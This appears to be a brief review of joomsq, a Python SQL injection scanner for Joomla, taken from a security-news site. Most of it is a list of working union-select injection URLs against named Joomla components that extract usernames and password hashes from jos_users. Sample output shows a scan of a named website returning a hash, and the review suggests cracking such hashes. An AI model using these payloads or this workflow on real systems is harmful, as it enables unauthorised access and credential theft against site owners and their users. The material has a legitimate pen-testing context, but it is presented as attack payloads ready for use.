|
Joomsq.pl
Joomla Sql Injection Scanner is an exceedingly quick python based vulnerability scanner that can be utilised against Joomla servers. It is regularly updated by the author with the current exploitable holes (sql injection) that affect Joomla and is also extremely easy to use. Successful use of the tool will almost certainly provide you with a nice MD5 hash for the website to put into/ submit to your favourite MD5 cracker.
It is available from here.
At the time of writing it checks for 67 distinct vulnerabilities, a sample of which are:
index.php?option=com_quiz&task=user_tst_shw&Itemid=61&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat
(username,0x3a,password)/**/from/**/jos_users/*, index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=-99887766/**/union/**/%20select/**/0,concat(username,0x3a,password,0x3a,email)
,2,3,4,5/**/%20from/**/%20jos_users/*, index.php?option=com_doc&task=view&sid=-1/**/union/**/select/**/concat(username,0x3a,password),1,2,concat(username,0x3a,password)
,0x3a,5,6,7,8,password,username,11/**/from/**/jos_users/, index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%
20where%20user_id=1=1/*, index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--, index.php?option=com_idvnews&id=-1/**/union/**/select/**/0,concat(username,0x3a,password),2222,concat(username,0x3a,password)
,0,0,0,0/**/from/**/jos_users/*, index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-
9999999+union/**/select+0x3a,0x3a,password,0,0,0,0,0,0,0,0,0x3a,0x3a,0x3a,0x3a,username/**/from/**/jos_users/*, index.php?option=com_referenzen&Itemid=7&detail=-9999999+union/**/select/**/0x3a,concat(username,0x3a,password)
,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,concat(username,0x3a,password),0,0,0,0,0/**/from/**/jos_users/*, index.php?option=com_genealogy&task=profile&id=-9999999/**/union/**/select/**/0,0x3a,2,0x3a,0x3a,5,0x3a,0x3a,8,concat(username,0x3a,password)
/**/from/**/jos_users/*, index.php?option=com_listoffreeads&AdId=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*, index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)
/**/from/**/jos_users/*, index.php?option=com_geoboerse&page=view&catid=-1/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*, index.php?option=com_ricette&Itemid=S@BUN&func=detail&id=-9999999/**/union/**/select/**/0,0,%20%20%
200x3a,111,222,333,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,concat(username,0x3a,password)/**/from/**/jos_users/*, index.php?option=com_team&gid=-1/**/union/**/select/**/1,2,3,password,5,6,7,8,9,10,username,12,13/**/from/**/jos_users/*, index.php?option=com_formtool&task=view&formid=2&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*,
Installation:
Download the file
Python needs to be installed.
Execution:
Usage: ./joomsq.py <joomla site>
Example Output:
C:\Python25>joomsq.py www.mgn-games.org
Joomla Sql Injection Scanner v 1.0
beenudel1986[at]gmail[dot]com [+] JoomlaPath: www.mgn-games.org [+] Vuln. Loaded: 67 [+] Testing...
Host: http://www.mgn-games.org/index.php?option=com_pcchess&Itemid=61&page=playe rs&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from /**/jos_users/* Found: - 5e48e4c3a47af5dbfb0a0edcc0fbca55 - 5e48e4c3a47af5dbfb0a0edcc0fbca55 - 5e48e4c3a47af5dbfb0a0edcc0fbca55 - 5e48e4c3a47af5dbfb0a0edcc0fbca55
[-] Done
|
IT Security News: Pen Testing Framework: Latest Tool Reviews:
|
|